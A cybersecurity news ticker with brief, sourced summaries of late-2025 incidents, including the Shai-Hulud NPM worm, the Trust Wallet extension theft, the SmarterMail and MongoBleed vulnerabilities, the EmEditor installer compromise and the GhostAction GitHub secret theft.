Ticker feed

Trust Wallet lost $8.5 million to hackers who exploited the Shai-Hulud supply chain attack that hit NPM in November. The attackers used leaked developer credentials to publish a malicious version of Trust Wallet's Chrome extension on December 24.

The fake extension targeted 2,520 wallet addresses, draining funds from users who logged in between December 24-26. Trust Wallet will reimburse all affected customers and urges users to update to version 2.69 immediately.

Shai-Hulud is a self-replicating worm that infected over 640 NPM packages, creating 25,000 data-leaking repositories. Despite cleanup efforts, over 12,000 machines remain compromised with exposed credentials still circulating.

Source: Security Week

A serious security vulnerability in Apache StreamPipes allows regular users to become administrators by manipulating JWT tokens. The flaw (CVE-2025-47411) affects versions 0.69.0 through 0.97.0 and exploits a broken user ID creation system.

Attackers can simply swap their username for an existing admin account to gain full control. Once inside, they can access sensitive data, modify system settings, and potentially compromise entire data streaming infrastructures.

The attack requires no special skills or tools, making it especially dangerous for companies handling sensitive business data. Apache released version 0.98.0 to fix the issue and urges immediate upgrades.

Source: CyberSecurity News

SmarterTools has issued an urgent security fix for a critical vulnerability in SmarterMail that scores a perfect 10.0 on the severity scale. The flaw, CVE-2025-52691, lets unauthenticated attackers upload files anywhere on mail servers and execute remote code without needing login credentials.

The vulnerability affects SmarterMail Build 9406 and earlier versions, putting organizations at immediate risk of complete system compromise. Attackers could access sensitive emails, deploy malware, steal data, and move laterally through corporate networks.

Chua Meng Han from Singapore's CSIT discovered the flaw. SmarterTools has released Build 9413 as a fix. Organizations must update immediately to prevent potential attacks.

Source: Cyber Security News

When cybercriminals strike, companies have just minutes to respond before hackers can "detonate" malware across entire systems. London-based S-RM leads the UK's largest cyber-incident response team, getting back to clients within six minutes on average during that critical "reconnaissance" period when attackers are still figuring out what to steal.

The firm faces ethical dilemmas as part of its "extortion support" work - negotiating ransoms with criminal groups. Director Ted Cowell says they challenge clients with "Why should we pay these criminals?" and push for no-payment decisions whenever possible. However, established ransomware groups often honor settlements, making payment sometimes rational for desperate businesses.

As corporate attitudes shift against funding organized crime, recovery services are growing while the UK's National Cyber Security Centre has become more proactive in warning potential victims.

Source: The Guardian

Popular text editor EmEditor was compromised between December 19-22, with hackers replacing the legitimate download link on the homepage with malicious software. Users who clicked "Download Now" during this window may have received a fake installer that looked identical to the real one but lacked proper digital signatures.

The malware collected sensitive data including system information, files from Desktop and Documents folders, VPN configurations, browser credentials, and login details for apps like Discord, Slack, Teams, and Steam. It also deployed a persistent browser extension called "Google Drive Caching" that hijacks cryptocurrency addresses and steals Facebook ad accounts.

Chinese security firm Qianxin discovered the attack primarily targets users outside former Soviet countries and Iran. EmEditor's developers have posted warnings and indicators of compromise on their website.

Source: Security Week

Pro-Russia hacktivist groups are exploiting weak passwords and exposed connections to breach US critical infrastructure systems in water treatment, food production, and energy sectors. CISA, FBI, and NSA report that groups like Cyber Army of Russia Reborn and NoName057(16) use basic hacking tools to access internet-facing control systems.

While less sophisticated than state-sponsored attacks, these intrusions have caused physical impacts including temporary system shutdowns and costly manual recoveries. The hackers alter system parameters, disable alarms, and restart devices primarily for online publicity rather than strategic advantage.

Federal agencies urge operators to reduce internet exposure, implement multi-factor authentication, and maintain manual operation contingency plans.

Source: Infosecurity Magazine

A critical security flaw dubbed "MongoBleed" is threatening over 87,000 MongoDB databases exposed online. The vulnerability (CVE-2025-14847) allows unauthenticated attackers to steal sensitive data directly from database memory, including passwords, session tokens, and customer information.

The flaw exploits MongoDB's default zlib compression feature. When attackers send specially crafted packets, they can "bleed" memory contents without needing login credentials. A proof-of-concept exploit is already public on GitHub, dramatically increasing attack risks.

Affected versions span from legacy 3.6 to current 8.2 releases. MongoDB has released patches, and administrators should immediately upgrade to versions 8.2.3, 8.0.17, 7.0.28, or newer. Organizations can temporarily disable zlib compression as a stopgap measure.

Source: Cybersecurity News

Freedom Mobile disclosed a data breach on October 23 after hackers gained access to customer accounts through a compromised subcontractor's credentials. The attackers accessed the company's customer management platform and obtained personal information including names, addresses, phone numbers, birth dates, and account numbers for a "limited number" of customers.

The Canadian telecom provider, which serves over 3.5 million subscribers, quickly blocked suspicious accounts and IP addresses. Freedom Mobile confirmed this wasn't a ransomware attack and that their network operations remained unaffected. The company hasn't revealed how many customers were impacted or identified the attackers.

This marks Freedom Mobile's second public data breach, following a 2019 incident involving 15,000 customers.

Source: SecurityWeek

Russia's attempt to shut down its massive illegal data market has completely backfired. For over a decade, the "probiv" market let anyone buy personal information like passport numbers and police records for as little as $10 from corrupt officials. The system helped both investigative journalists expose corruption and police track dissidents.

But as phone scammers and Ukrainian intelligence exploited the leaks, Putin cracked down with 10-year prison sentences and arrests of major operators. Instead of stopping the trade, brokers simply moved overseas where they operate without restrictions. Now they're dumping even more sensitive data, including massive FSB border crossing records and bank customer information affecting millions of Russians.

Source: The Guardian

A massive supply chain attack called "GhostAction" has compromised 327 GitHub users across 817 repositories, stealing over 3,325 secrets including DockerHub credentials, GitHub tokens, and npm tokens. GitGuardian discovered the attack on September 5 when investigating suspicious activity in the FastUUID project repository.

The attack began with a compromised maintainer pushing malicious GitHub action workflow files designed to steal secrets. While FastUUID wasn't the main target, investigators uncovered hundreds of similar malicious commits across multiple repositories, all connected to the same threat actor.

Several companies had their entire SDK portfolios compromised, affecting Python, Rust, JavaScript, and Go repositories simultaneously. GitGuardian notified affected users immediately, with 100 repositories already reverting the malicious changes, though hundreds remain at risk.

Source: Infosecurity Magazine